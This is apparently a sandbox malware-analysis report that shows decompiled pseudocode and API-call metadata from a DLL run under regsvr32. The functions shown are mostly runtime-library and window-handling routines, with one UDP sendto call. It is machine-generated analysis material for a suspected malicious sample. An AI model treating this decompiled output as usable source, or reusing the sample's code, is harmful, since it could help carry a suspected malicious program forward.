                                                                                                                                                                            			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				void* _t28;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = __ebx;
                                                                                                                                                                            				_t25 = _a16;
                                                                                                                                                                            				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                            					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t35 = _t25 - 0x66;
                                                                                                                                                                            					if(_t25 != 0x66) {
                                                                                                                                                                            						__eflags = _t25 - 0x61;
                                                                                                                                                                            						if(_t25 == 0x61) {
                                                                                                                                                                            							L7:
                                                                                                                                                                            							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags = _t25 - 0x41;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								goto L7;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L9:
                                                                                                                                                                            						return _t26;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}







                                                                                                                                                                            0x100223dd
                                                                                                                                                                            0x100223e0
                                                                                                                                                                            0x100223e6
                                                                                                                                                                            0x10022459
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100223ed
                                                                                                                                                                            0x100223ed
                                                                                                                                                                            0x100223f0
                                                                                                                                                                            0x1002240b
                                                                                                                                                                            0x1002240e
                                                                                                                                                                            0x1002242e
                                                                                                                                                                            0x10022440
                                                                                                                                                                            0x10022410
                                                                                                                                                                            0x10022410
                                                                                                                                                                            0x10022413
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10022415
                                                                                                                                                                            0x10022427
                                                                                                                                                                            0x10022427
                                                                                                                                                                            0x10022413
                                                                                                                                                                            0x1002245e
                                                                                                                                                                            0x10022462
                                                                                                                                                                            0x100223f2
                                                                                                                                                                            0x1002240a
                                                                                                                                                                            0x1002240a
                                                                                                                                                                            0x100223f0

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                                                            • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                                            • Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                                            • Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                            				struct HWND__* _t10;
                                                                                                                                                                            				void* _t14;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                            				struct HWND__* _t17;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            
                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                            				_t13 = __ebx;
                                                                                                                                                                            				_t9 = GetDlgItem(_a4, _a8);
                                                                                                                                                                            				_t15 = GetTopWindow;
                                                                                                                                                                            				_t16 = _t9;
                                                                                                                                                                            				if(_t16 == 0) {
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t10 = GetTopWindow(_a4);
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_t17 = _t10;
                                                                                                                                                                            						__eflags = _t17;
                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                            							goto L10;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
                                                                                                                                                                            						__eflags = _t10;
                                                                                                                                                                            						if(_t10 == 0) {
                                                                                                                                                                            							_t10 = GetWindow(_t17, 2);
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if(GetTopWindow(_t16) == 0) {
                                                                                                                                                                            						L3:
                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                            						if(_a12 == 0) {
                                                                                                                                                                            							return E1000FB5C(_t13, _t14, _t18);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
                                                                                                                                                                            						__eflags = _t10;
                                                                                                                                                                            						if(_t10 == 0) {
                                                                                                                                                                            							goto L6;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
                                                                                                                                                                            						if(_t10 == 0) {
                                                                                                                                                                            							goto L3;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				L10:
                                                                                                                                                                            				return _t10;
                                                                                                                                                                            			}













                                                                                                                                                                            0x1000fe47
                                                                                                                                                                            0x1000fe47
                                                                                                                                                                            0x1000fe52
                                                                                                                                                                            0x1000fe58
                                                                                                                                                                            0x1000fe5e
                                                                                                                                                                            0x1000fe62
                                                                                                                                                                            0x1000fe92
                                                                                                                                                                            0x1000fe95
                                                                                                                                                                            0x1000feb2
                                                                                                                                                                            0x1000feb2
                                                                                                                                                                            0x1000feb4
                                                                                                                                                                            0x1000feb6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fea0
                                                                                                                                                                            0x1000fea5
                                                                                                                                                                            0x1000fea7
                                                                                                                                                                            0x1000feac
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000feac
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fea7
                                                                                                                                                                            0x1000fe64
                                                                                                                                                                            0x1000fe69
                                                                                                                                                                            0x1000fe7b
                                                                                                                                                                            0x1000fe7f
                                                                                                                                                                            0x1000fe80
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fe82
                                                                                                                                                                            0x1000fe89
                                                                                                                                                                            0x1000fe8e
                                                                                                                                                                            0x1000fe90
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fe6b
                                                                                                                                                                            0x1000fe72
                                                                                                                                                                            0x1000fe79
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fe79
                                                                                                                                                                            0x1000fe69
                                                                                                                                                                            0x1000febb
                                                                                                                                                                            0x1000febb

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32 ref: 1000FE52
                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 1000FE65
                                                                                                                                                                              • Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC
                                                                                                                                                                            • GetTopWindow.USER32(?), ref: 1000FE95
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Item
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 369458955-0
                                                                                                                                                                            • Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
                                                                                                                                                                            • Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
                                                                                                                                                                            • Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
                                                                                                                                                                            • Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                            			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                            				LONG* _t21;
                                                                                                                                                                            				long _t23;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            				LONG* _t33;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            
                                                                                                                                                                            				_t35 = __eflags;
                                                                                                                                                                            				_t29 = __edx;
                                                                                                                                                                            				_t25 = __ebx;
                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                            				_push(0x1002fae0);
                                                                                                                                                                            				E1001984C(__ebx, __edi, __esi);
                                                                                                                                                                            				_t31 = E1001BF79(__edx, __edi, _t35);
                                                                                                                                                                            				_t15 =  *0x1005826c; // 0xfffffffe
                                                                                                                                                                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                            					E1001A549(0xd);
                                                                                                                                                                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                            					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                            					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                            					__eflags = _t33 -  *0x10058170; // 0x4a41308
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                            						if(_t33 != 0) {
                                                                                                                                                                            							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                            							if(_t23 == 0) {
                                                                                                                                                                            								__eflags = _t33 - 0x10057d48;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_push(_t33);
                                                                                                                                                                            									E10016380(_t25, _t31, _t33, __eflags);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_t21 =  *0x10058170; // 0x4a41308
                                                                                                                                                                            						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                            						_t33 =  *0x10058170; // 0x4a41308
                                                                                                                                                                            						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                            						InterlockedIncrement(_t33);
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                            					E1001D757();
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t33 == 0) {
                                                                                                                                                                            					E10017DA6(_t25, _t29, _t31, 0x20);
                                                                                                                                                                            				}
                                                                                                                                                                            				return E10019891(_t33);
                                                                                                                                                                            			}










                                                                                                                                                                            0x1001d6bc
                                                                                                                                                                            0x1001d6bc
                                                                                                                                                                            0x1001d6bc
                                                                                                                                                                            0x1001d6bc
                                                                                                                                                                            0x1001d6be
                                                                                                                                                                            0x1001d6c3
                                                                                                                                                                            0x1001d6cd
                                                                                                                                                                            0x1001d6cf
                                                                                                                                                                            0x1001d6d7
                                                                                                                                                                            0x1001d6f8
                                                                                                                                                                            0x1001d6fe
                                                                                                                                                                            0x1001d702
                                                                                                                                                                            0x1001d705
                                                                                                                                                                            0x1001d708
                                                                                                                                                                            0x1001d70e
                                                                                                                                                                            0x1001d710
                                                                                                                                                                            0x1001d712
                                                                                                                                                                            0x1001d715
                                                                                                                                                                            0x1001d71b
                                                                                                                                                                            0x1001d71d
                                                                                                                                                                            0x1001d71f
                                                                                                                                                                            0x1001d725
                                                                                                                                                                            0x1001d727
                                                                                                                                                                            0x1001d728
                                                                                                                                                                            0x1001d72d
                                                                                                                                                                            0x1001d725
                                                                                                                                                                            0x1001d71d
                                                                                                                                                                            0x1001d72e
                                                                                                                                                                            0x1001d733
                                                                                                                                                                            0x1001d736
                                                                                                                                                                            0x1001d73c
                                                                                                                                                                            0x1001d740
                                                                                                                                                                            0x1001d740
                                                                                                                                                                            0x1001d746
                                                                                                                                                                            0x1001d74d
                                                                                                                                                                            0x1001d6df
                                                                                                                                                                            0x1001d6df
                                                                                                                                                                            0x1001d6df
                                                                                                                                                                            0x1001d6e4
                                                                                                                                                                            0x1001d6e8
                                                                                                                                                                            0x1001d6ed
                                                                                                                                                                            0x1001d6f5

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
                                                                                                                                                                              • Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87
                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 1001D6E8
                                                                                                                                                                            • __lock.LIBCMT ref: 1001D6F8
                                                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 1001D715
                                                                                                                                                                            • InterlockedIncrement.KERNEL32(04A41308), ref: 1001D740
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2880340415-0
                                                                                                                                                                            • Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
                                                                                                                                                                            • Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
                                                                                                                                                                            • Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
                                                                                                                                                                            • Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                            			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				short _v20;
                                                                                                                                                                            				short _v22;
                                                                                                                                                                            				char _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                            				short _t18;
                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                            
                                                                                                                                                                            				_t15 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v8 = _t15 ^ _t33;
                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                            				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
                                                                                                                                                                            				_v24 = 2;
                                                                                                                                                                            				__imp__#11(_a4);
                                                                                                                                                                            				_v20 = _t18;
                                                                                                                                                                            				__imp__#9(_a8);
                                                                                                                                                                            				_v22 = _t18;
                                                                                                                                                                            				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
                                                                                                                                                                            				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
                                                                                                                                                                            			}












                                                                                                                                                                            0x10001366
                                                                                                                                                                            0x1000136d
                                                                                                                                                                            0x10001370
                                                                                                                                                                            0x1000137b
                                                                                                                                                                            0x10001383
                                                                                                                                                                            0x1000138d
                                                                                                                                                                            0x10001393
                                                                                                                                                                            0x1000139b
                                                                                                                                                                            0x100013a1
                                                                                                                                                                            0x100013bc
                                                                                                                                                                            0x100013cf

                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 1000137B
                                                                                                                                                                            • inet_addr.WS2_32(?), ref: 1000138D
                                                                                                                                                                            • htons.WS2_32(?), ref: 1000139B
                                                                                                                                                                            • sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memsethtonsinet_addrsendto
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1158618643-0
                                                                                                                                                                            • Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
                                                                                                                                                                            • Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
                                                                                                                                                                            • Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
                                                                                                                                                                            • Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000CCD3() {
                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                            				struct HWND__* _t19;
                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                                                                                                                                                                            				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                                                                                            				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                                                                                                                                                                            					E10012913(_t23, 1);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                                                                                                                                                                            					EnableWindow( *(_t29 - 0x14), 1);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t29 - 0x14) != 0) {
                                                                                                                                                                            					_t19 = GetActiveWindow();
                                                                                                                                                                            					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                                                                                                                                                                            					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                                                                                                                                                                            						SetActiveWindow( *(_t29 - 0x14));
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				 *((intOrPtr*)( *_t28 + 0x60))();
                                                                                                                                                                            				E1000C6E6(_t23, _t28, 0, _t28, _t34);
                                                                                                                                                                            				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                                                                                                                                                                            					FreeResource( *(_t29 - 0x18));
                                                                                                                                                                            				}
                                                                                                                                                                            				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                                                                                                                                                                            				return E10017C60(_t16);
                                                                                                                                                                            			}








                                                                                                                                                                            0x1000ccd3
                                                                                                                                                                            0x1000ccd6
                                                                                                                                                                            0x1000ccde
                                                                                                                                                                            0x1000cce4
                                                                                                                                                                            0x1000cce4
                                                                                                                                                                            0x1000ccec
                                                                                                                                                                            0x1000ccf3
                                                                                                                                                                            0x1000ccf3
                                                                                                                                                                            0x1000ccfc
                                                                                                                                                                            0x1000ccfe
                                                                                                                                                                            0x1000cd04
                                                                                                                                                                            0x1000cd07
                                                                                                                                                                            0x1000cd0c
                                                                                                                                                                            0x1000cd0c
                                                                                                                                                                            0x1000cd07
                                                                                                                                                                            0x1000cd16
                                                                                                                                                                            0x1000cd1b
                                                                                                                                                                            0x1000cd23
                                                                                                                                                                            0x1000cd28
                                                                                                                                                                            0x1000cd28
                                                                                                                                                                            0x1000cd2e
                                                                                                                                                                            0x1000cd36

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000CCF3
                                                                                                                                                                            • GetActiveWindow.USER32 ref: 1000CCFE
                                                                                                                                                                            • SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,F0ED3D8B), ref: 1000CD0C
                                                                                                                                                                            • FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,F0ED3D8B), ref: 1000CD28
                                                                                                                                                                              • Part of subcall function 10012913: EnableWindow.USER32(?,F0ED3D8B), ref: 10012920
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ActiveEnable$FreeResource
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 253586258-0
                                                                                                                                                                            • Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
                                                                                                                                                                            • Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
                                                                                                                                                                            • Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
                                                                                                                                                                            • Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                            			E1000AD21(void* __ecx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				char _v18;
                                                                                                                                                                            				char _v280;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                            				long _t14;
                                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                                            				char* _t18;
                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                            
                                                                                                                                                                            				_t11 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v8 = _t11 ^ _t36;
                                                                                                                                                                            				_t35 = 0x104;
                                                                                                                                                                            				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                                                                                                                                                                            				if(_t14 == 0 || _t14 == 0x104) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t15 = 0;
                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t18 = PathFindExtensionA( &_v280);
                                                                                                                                                                            					_t35 = "%s.dll";
                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                            					asm("movsw");
                                                                                                                                                                            					_t32 =  &_v280;
                                                                                                                                                                            					_t41 = _t18 -  &_v280 + 7 - 0x106;
                                                                                                                                                                            					asm("movsb");
                                                                                                                                                                            					_t33 = _t33;
                                                                                                                                                                            					if(_t18 -  &_v280 + 7 > 0x106) {
                                                                                                                                                                            						goto L4;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
                                                                                                                                                                            						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                                                                                            			}

















                                                                                                                                                                            0x1000ad2a
                                                                                                                                                                            0x1000ad31
                                                                                                                                                                            0x1000ad37
                                                                                                                                                                            0x1000ad47
                                                                                                                                                                            0x1000ad4f
                                                                                                                                                                            0x1000ada6
                                                                                                                                                                            0x1000ada6
                                                                                                                                                                            0x1000ada6
                                                                                                                                                                            0x1000ad55
                                                                                                                                                                            0x1000ad5d
                                                                                                                                                                            0x1000ad63
                                                                                                                                                                            0x1000ad6b
                                                                                                                                                                            0x1000ad6c
                                                                                                                                                                            0x1000ad70
                                                                                                                                                                            0x1000ad7b
                                                                                                                                                                            0x1000ad81
                                                                                                                                                                            0x1000ad82
                                                                                                                                                                            0x1000ad83
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ad85
                                                                                                                                                                            0x1000ad90
                                                                                                                                                                            0x1000ad9f
                                                                                                                                                                            0x1000ad9f
                                                                                                                                                                            0x1000ad83
                                                                                                                                                                            0x1000adb4

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
                                                                                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D
                                                                                                                                                                              • Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF
                                                                                                                                                                              • Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
                                                                                                                                                                              • Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
                                                                                                                                                                              • Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
